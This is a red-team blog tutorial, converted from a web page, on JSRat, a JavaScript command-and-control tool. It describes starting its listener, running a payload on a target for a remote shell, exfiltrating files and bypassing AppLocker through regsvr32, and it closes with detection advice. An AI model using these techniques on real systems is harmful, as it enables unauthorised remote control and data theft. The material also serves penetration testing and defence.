Penetration Testing Lab

Articles from the Pentesting Field

Home Pentesting Distros Resources Submissions Toolkit Contact the Lab

Command and Control – Web Interface Search the Lab

Search...
Microsoft Office – DDE Attacks

Author
January 8, Command and Control – JavaScript
2018
netbiosX Red Team C&C, C2, Command and Control, JSRat, Red Team Lea
a comment
netbiosX

There are a number command and controls tools that can use a variety fof methods in
order to hide malicious traffic or execute implants in various formats. Casey Smith Follow PenTest Lab
originally developed a prototype tool which is using JavaScript as a payload and it
connects back to a listening web server. A security researcher 3gstudent extended Casey Enter your email address to follow this blog and
Smith work and developed JSRat in PowerShell which provides some additionally receive notifications of new posts by email.
functionality. Other variations of this tool exist in Python so the master host can be either a
Linux machine or a Windows. Similarly another C2 tool that can generate JavaScript Join 1,667 other followers
implants is called PoshC2 from Nettitude.
Enter your email address
JSRat is a command and control tool which is using JavaScript payloads and the HTTP
Follow
protocol for communication between the server and the target hosts. There are two

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 implementations one in Python and one in PowerShell which their usage is described Recent Posts
below.
Command and Control – Browser

Python SPN Discovery

Situational Awareness
The python implementation of JSRat will start a web server and it will wait for the client
Lateral Movement – WinRM
command to be executed:
AppLocker Bypass – CMSTP
1 python MyJSRat.py -i 192.168.1.203 -p 8080

Categories
Coding (10)
Defense Evasion (20)
Exploitation Techniques (19)
External Submissions (3)
General Lab Notes (21)
Information Gathering (12)
Infrastructure (2)
Maintaining Access (4)
JSRat – Server Mobile Pentesting (7)
Network Mapping (1)
Once the user visit the Client Command URL a connection will be established with the
Post Exploitation (12)
host. The JSRat can be used to executed commands, run executables and scripts or just
Privilege Escalation (14)
for data exfiltration.
Red Team (27)
Social Engineering (11)
Tools (7)
VoIP (4)
Web Application (14)
Wireless (2)

Archives

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 June 2018
May 2018
April 2018
January 2018
December 2017
November 2017
October 2017
September 2017
August 2017
July 2017
JSRat – Usage Options
June 2017

In order to establish a proper shell a JavaScript payload needs to be executed. This May 2017

payload is stored on the URL below: April 2017

March 2017
February 2017
January 2017
November 2016
September 2016
February 2015
January 2015
July 2014
JSRat – Generated Command
April 2014

The command that it has been generated needs to be executed from command prompt. June 2013
May 2013
April 2013
March 2013
February 2013
January 2013
December 2012
JSRat – Implant Execution
November 2012
October 2012

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Once the command is executed a shell will be received. September 2012
August 2012
July 2012
June 2012
April 2012
March 2012
February 2012

@ Twitter
#BSidesLDN2018 was great so far! Many thanks to
@dradisfw for the ticket #dradis #greatproduct
6 hours ago
Great talk by @john_shier about Dark Web!
#BSidesLDN2018 https://t.co/1yC8lVKn3X
7 hours ago
JSRat – Console
RT @myexploit2600: I be talking at 14:00 in track 2
@BSidesLondon #BsidesLDN2018 7 hours ago
Commands can be executed from the shell as normal.
Finally a social engineering talk #BSidesLDN2018
https://t.co/jMMk4lvbcH 7 hours ago
[New Post] Command and Control - Browser
pentestlab.blog/2018/06/06/com… #pentestlab
#Redteam 9 hours ago

Follow @netbiosX

Pen Test Lab Stats

3,030,655 hits

Blogroll
JSRat – Command Execution

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Packetstorm Exploits,Advisories,Tools,Whitepapers
JSRat can also read, download or upload files. 0
Metasploit Latest news about Metasploit Framework
and tutorials 0
0x191unauthorized Tutorials 0
The home of WeBaCoo Information about the
WeBaCoo and other tutorials 0
Command Line Kung Fu Command Line Tips and
Tricks 0

JSRat – Data Exfiltration Exploit Databases

Execution of executables and scripts can be also performed by following a sequence like: Exploit Database Exploits,PoC,Shellcodes,Papers
0
1. run Metasploit Database Exploit & Auxiliary Modules 0
2. calc.exe Inj3ct0r Database Remote,Local,Web
Apps,Shellcode,PoC 0

Pentest Blogs
Carnal0wnage Ethical Hacking Tutorials 0
Coresec Pentest tutorials,Code,Tools 0
Notsosecure From Pentesters To Pentesters 0
Pentestmonkey Cheatsheets,Tools and SQL
Injection 0
Pentester Web Application Testing,Tips,Testing
Tools 0
Packetstorm Exploit Files 0
room362 Blatherings of a Security Addict 0
darkoperator Shell is only the Beginning 0
Irongeek Hacking Videos,Infosec Articles,Scripts 0

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Professional
The Official Social Engineering Portal Information
about the Social Engineering Framework,Podcasts
and Resources 0

Next Conference

Security B-Sides London

April 29th, 2014

The big day is here.

Facebook Page

Penetrati…
9.9K likes
JSRat – Run Executables

There is also another python implementation of this tool which provides and a method
Like Page
(regsvr32) of AppLocker bypass.

Be the first of your friends to

like this

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 JSRat – AppLocker Bypass Method Advertisements

The JSRat will generate and host a scriptlet file which will contain the payload.

PowerShell
Alternatively there is also a PowerShell implementation of this JSRat which can perform
the same operations from a PowerShell console. The script needs to be modified with the
IP address of the listener prior to any execution.

JSRat PowerShell – Server Listening

The payload command that needs to be executed on the target is also included in the
comments of the script.

JSRat PowerShell – Payload Command

Running the payload command will connect the target host and a console will be obtained.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 JSRat PowerShell – Usage

Commands can be executed on the target like any other normal command prompt.

JSRat PowerShell – Command Execution

Conclusion
The major advantage of this command and control tool is that it doesn’t need any implant
to be written into disk. It is very fast and all the communication is done via HTTP which is a
common protocol. Since JSRat is using JavaScript payloads detection is hard unless

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 rundll32 is monitored. Enabling and configuring AppLocker to deny execution of rundll32
and regsvr32 will prevent the attack.

Resources

https://github.com/aspiggy/JSRAT
https://github.com/Ridter/MyJSRat
https://github.com/Hood3dRob1n/JSRat-Py

https://github.com/3gstudent/Javascript-Backdoor

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Advertisements

Rate this:

2 Votes

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Share this:

 Twitter  Facebook 78  LinkedIn  Pinterest

 Reddit  Tumblr  Google

Like
One blogger likes this.

Related

Command and Control - Command and Control - Lateral Movement -

Browser WebDAV WinRM
In "Red Team" In "Red Team" In "Red Team"

Leave a Reply

Enter your comment here...

Command and Control – Web Interface

Microsoft Office – DDE Attacks

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Blog at WordPress.com.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD